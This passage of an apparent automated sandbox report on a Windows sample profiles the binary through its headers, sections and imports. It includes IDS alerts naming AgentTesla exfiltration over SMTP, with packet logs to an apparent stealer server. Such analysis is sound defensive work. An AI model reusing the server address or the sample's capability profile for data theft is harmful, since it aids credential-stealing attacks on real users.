call 00007F74C091B3F1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x50de4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x125000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x50de4	0x50e00	42c65ba3493ca51a6d7a5866f5327026	False	0.9192758645672334	data	7.873959292507291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x125000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x4807a	data			1.000325386226672
RT_GROUP_ICON	0x124834	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1248ac	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1248c0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1248d4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1248e8	0x10c	data	English	Great Britain	0.5895522388059702
RT_MANIFEST	0x1249f4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-07:22:34.895574	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49725	587	192.168.2.6	37.247.115.2
04/24/24-07:22:39.546628	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49726	587	192.168.2.6	37.247.115.2
04/24/24-07:22:48.094441	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49729	587	192.168.2.6	37.247.115.2
04/24/24-07:22:44.700473	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49728	587	192.168.2.6	37.247.115.2

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 07:22:29.715867043 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:29.715913057 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:29.715982914 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:29.726708889 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:29.726742029 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.061789989 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.061886072 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:30.063750982 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:30.063771963 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.064066887 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.109895945 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:30.114330053 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:30.156124115 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.503871918 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.503937006 CEST	443	49724	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:30.504132986 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:30.510370016 CEST	49724	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:32.365859985 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:32.668442965 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:32.668585062 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:33.013158083 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:33.013447046 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:33.316807032 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:33.317781925 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:33.620573997 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:33.621953964 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:33.933095932 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:33.933387041 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.236073017 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:34.236295938 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.579077005 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:34.591754913 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:34.592009068 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.894897938 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:34.894957066 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:34.895574093 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.895634890 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.895659924 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:34.895683050 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:35.198246956 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:35.198586941 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:35.207439899 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:35.250505924 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:35.266123056 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:35.610163927 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:35.770392895 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:35.770488977 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:35.935686111 CEST	49725	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:35.936664104 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:36.238255978 CEST	587	49725	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:36.243428946 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:36.243527889 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:36.581536055 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:36.625562906 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:37.644454002 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:37.953645945 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:37.954040051 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:38.260848045 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:38.261214972 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:38.575443029 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:38.575647116 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:38.882162094 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:38.882308006 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.230097055 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.238259077 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.238473892 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.546291113 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.546418905 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.546627998 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.546679020 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.546703100 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.546724081 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:39.853034019 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.863827944 CEST	587	49726	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:39.906796932 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:40.837827921 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:40.837882996 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:40.837973118 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:40.846050978 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:40.846070051 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.180675983 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.180794954 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:41.182658911 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:41.182678938 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.183643103 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.234541893 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:41.276125908 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.475042105 CEST	49726	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:41.614660025 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.614804983 CEST	443	49727	104.26.12.205	192.168.2.6
Apr 24, 2024 07:22:41.615307093 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:41.617611885 CEST	49727	443	192.168.2.6	104.26.12.205
Apr 24, 2024 07:22:42.137511969 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:42.444211960 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:42.444420099 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:42.794444084 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:42.794764996 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:43.102283001 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:43.102674961 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:43.409713984 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:43.411741018 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:43.727371931 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:43.727730989 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.034557104 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:44.034811974 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.382077932 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:44.392299891 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:44.392625093 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.699799061 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:44.699824095 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:44.700473070 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.700532913 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.700532913 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:44.700544119 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:45.007445097 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.007469893 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.016998053 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.034383059 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:45.381143093 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.542526960 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.542623997 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:45.542736053 CEST	49728	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:45.543581963 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:45.849303007 CEST	587	49728	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.850177050 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:45.850270987 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:46.198443890 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:46.198760986 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:46.506078005 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:46.506376028 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:46.813333035 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:46.813666105 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:47.128043890 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:47.128324032 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:47.435302973 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:47.435672045 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:47.783164978 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:47.787137985 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:47.787305117 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:48.093914986 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:48.094044924 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:48.094440937 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:48.094441891 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:48.094541073 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:48.094541073 CEST	49729	587	192.168.2.6	37.247.115.2
Apr 24, 2024 07:22:48.401359081 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:48.410304070 CEST	587	49729	37.247.115.2	192.168.2.6
Apr 24, 2024 07:22:48.454828978 CEST	49729	587	192.168.2.6	37.247.115.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 07:22:29.556003094 CEST	65295	53	192.168.2.6	1.1.1.1
Apr 24, 2024 07:22:29.709443092 CEST	53	65295	1.1.1.1	192.168.2.6
